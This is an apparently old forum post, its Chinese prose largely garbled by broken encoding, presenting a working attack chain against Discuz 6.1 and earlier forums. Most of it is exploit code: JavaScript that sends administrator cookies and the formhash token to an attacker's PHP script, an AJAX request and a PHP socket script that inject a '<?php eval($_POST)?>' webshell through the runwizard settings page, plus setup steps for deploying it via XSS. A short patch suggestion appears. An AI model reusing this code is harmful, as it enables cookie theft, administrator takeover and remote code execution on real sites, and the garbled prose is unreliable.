admin 2012-9-13 17:11:49

Discuz XSSwebshell

Discuz XSSwebshell
By racle @tian6.com
ӭת.뱣ȨϢ.
Ӱ汾:Discuz<=6.1.0,gbk+utf+big5

ȫJSð汾,ֻһļ.ajax-racle.js.Ч汾DZ6.1(7.0汾,6.1ϰ汾ѾĬϴϲ),汾ж,ԷΪIEFIREFOXЧ.


3ǰ̳ʹ,˵Discuzи̳ʼ˻WEBSHELL©,superheiǰһDISCUZ©֮һ.ԭ:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
ʱ˵һŪ,ʵһӴ,©ҪԱ̨Ȩ,Ҫ㷺ձûǺܸӵ,Ҫ¼,ϵŻ깤.

дEXPĹ,õt0by57,SuperheiĴ.PHPJSŶ!ϣҿƪʱ,ע׵Ĺ,ϾXSSĿǰWEBȫͷϷ.ʽ:XSIO,Cross Iframe Trick,crsfȵ..
һFLASH XSSӦ÷:Discuzshell-Flash XSS


----------------------------------------------------------ǰԷָ-----------------------------------------------------------------------------


problem1:©ҳrunwizard.inc.phpύʽΪpost.ҪģPOSTύ.

problem2:DISCUZ̳ύʱ֤referer,˻Ҫαһ.php socketjsαreferer.

problem3:formhash()û++XXX㷨ó,û취ģ,ֺķһʱ,뵽ɵ취,Դ.Ǻ.DzοsuperheiһEXP.


,ΪҼ˵˵©ijͲİ취.©ļ:bbs/admin/runwizard.inc.php,иfunction saverunwizardhistory() {

      global $runwizardfile, $runwizardhistory;

      $fp = fopen($runwizardfile, 'w');

      fwrite($fp, serialize($runwizardhistory));

      fclose($fp);

}
ƴserialize($runwizardhistory)ֱӾд$fp.runwizardhistoryʲô?̳һЩϢ,Ʃ̳.Ӧ̨̳,λ:discuz.com/bbs/admincp.php?action=runwizard&step=2.̳,ַϢûκι.κһֱдһ仰,ύ,Ȼ󱣴ڻ:bbs/forumdata/logs/runwizardlog.php.
޲İ취:function saverunwizardhistory() {

      global $runwizardfile, $runwizardhistory;

      $fp = fopen($runwizardfile, 'w');

      $s = '<?php exit;?>';

      $s .= serialize($runwizardhistory);

      fwrite($fp, $s);

      fclose($fp);

}
ƴд '<?php exit;?>';ǰ,˳ҺԸļPHP.ôʹһ仰,Ҳٱִ.



----------------------------------------©ij÷ָ-----------------------------------------------------------------------------


Ǹ©ij÷.ҿ,ҲΪǸ©˰,ҪйԱȨ,к̨Ȩ,ȻWEBSHELL,ʵ˵,к̨Ȩ,SHELLİ취Ҳֹһ.ļֵ,Ͳ.Ȼ,ѾndayұҪص.Ҫߴ,XSS,Crsfͱ©İ취.öֵʹܶ.

ǵ˼·:̳иxss,Crsf flash(ȷ,Discuz! member.php xss bug,Discuz! ݿϢxss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz! xss bug),Ա,ִǵJS,ⲿһJS,ͨJSCOOKIES,HASH,Ȼ󾭹ⲿһPHPװSOCKETPOSTʽύǰ˵Ķ,̳ûвϸ(Ŀǰû̳.Ȼ,Ѿ.^^),ôͻbbs/forumdata/logs/runwizardlog.phpWEBSHELL.

ƪҪǸҸEXP,ȻôŵҺڵ,Ҫǽ,˼·.Ϊѧʲ.

Ҫ,ôͨJS,ùԱCOOKIES,ȻCOOKIESݸύPHP.õİ취ŴҶ֪,Ǵݵİ취,ƩͼƬʽ,ͷdzȶʵ.ʵAJAXԵPHPĺð취.JSִ:

var url="http://Ŀվ/admincp.php";      

/*cookies*/

function getURL(s) {

var image = new Image();

image.style.width = 0;

image.style.height = 0;

image.src = s;

}

getURL("õĽcookies.php?x="+encodeURIComponent(document.cookie));//ͨimagephp
ƴphpgetʽչı.$cookies=$_GET['x'];
ƴͬ,hashҲôPHP.HASHĻ÷ҲǺ˼,֪,discuzformhashÿȨʵΨһ.ҲԷ,̳ҳû˳ĵط,hash.Ҫ,ǴҳԴļhash,ɸѡ,ݸPHP.ɸѡİ취ܶ,ȤĻ,ԿҵɸѡJS(discuzʵһ,Ǻ) :)


cookieshashԺ,Ҫ,һģύ,ҿԿ,֮ǰдõAJAXύʽ:var url="http://tian6.com/raclebbs/";



/*hash*/

var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");

xmlHttpReq.open("GET", url+"admincp.php?action=home", false);

xmlHttpReq.send();

var resource = xmlHttpReq.responseText;

var numero = resource.search(/formhash/);

var formhash=encodeURIComponent(resource.substr(numero+17,8));



var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST)%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//ҪЯ

xmlHttpReq.open("POST",url+"admincp.php?action=runwizard&step=3",false);//ʹPOSTһӣ첽ʽͨ

xmlHttpReq.setRequestHeader("Referer", url);

xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setrequestheader("content-length",post.length);

xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");

xmlHttpReq.send(post);//
ƴHASHҼȷ,ύ,Ҳcookies

ٿPHP SOCKETʽύ.$sock = fsockopen("$url", 80, $errno, $errstr, 30);

if (!$sock) die("$errstr ($errno)\n");

$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST)%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';



fwrite($sock, "POST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");

fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");

fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");

fwrite($sock, "Accept-Language: zh-cn\r\n");

fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");

fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");

fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");

fwrite($sock, "Host: $url\r\n");

fwrite($sock, "Content-Length: ".strlen($data)."\r\n");

fwrite($sock, "Connection: Keep-Alive\r\n");

fwrite($sock, "Cache-Control: no-cache\r\n");

fwrite($sock, "Cookie:".$cookies."\r\n\r\n");

fwrite($sock, $data);



$headers = "";

while ($str = trim(fgets($sock, 4096)))

   $headers .= "$str\n";

echo "\n";

$body = "";

while (!feof($sock))

   $body .= fgets($sock, 4096);

fclose($sock);

echo $body;
ƴ©XSSӦô,渽JSļ,PHPװõύļ.ļһ,עûſ,Ҳûϵ,ϸǰķ,Ҳд.^^


-------------------------------------------XSSļָ-----------------------------------------------------------------------------


1:PHP SOCKET÷ȴracle.js

var url="http://tian6.com/raclebbs/admincp.php?action=home"; //ijҪXSSĿ,Ʃhttp://www.discuz.com/admincp.php?action=home



Ȼracle@tian6.php

$url="racle@tian6.com";   //ijҪXSSĿ,Ʃwww.discuz.com



Ŀ̳Ϊ6.1汾,ٸĶ.ĿΪ6.0°汾,޸:

getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));

Ϊ

getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
ƴ2:JS÷ajax-racle.js,޸var url="http://tian6.com/raclebbs/";ΪҪַ̳.



Ŀ̳Ϊ6.1汾,ٸĶ.ĿΪ6.0°汾,޸:

var formhash=encodeURIComponent(resource.substr(numero+17,8));

Ϊ

var formhash=encodeURIComponent(resource.substr(numero+9,8));
ƴok.ַһ.ڹǰ,Ӧȿ̳ϲû,ԳԷ:http://target.com/bbs/forumdata/logs/runwizardlog.php,һƬհ,ǾûϷ.ǿհ׾ͻЩ̳Ϣ,ҲͿ϶©,Ϊ˼Ҳ֮ûи¹̳Ϣ.Ŀǰ˵,8ɰհ.

ǵһַ,Ͱracle.js,racle@tian6.phpļϴһִPHPĵط,ƩǰµWEBSHELL.ļͬһĿ¼.ǵøÿռҪ֧PHP.Ȼ̳<script src=http://źõĵط/racle.js></script>XSS.

ǵڶַ,Ͱajax-racle.js,ϴһǰµWEBSHELL,Ȼ̳<script src=http://źõĵط/ajax-racle.js></script>XSS.

ʲô,ȵԱһӻһ̳,̳bbs/forumdata/logs/runwizardlog.phpͶ˸<?php eval($_POST)?> ^^.Ͻÿƶȥ.

ҳ: [1]
鿴汾: Discuz XSSwebshell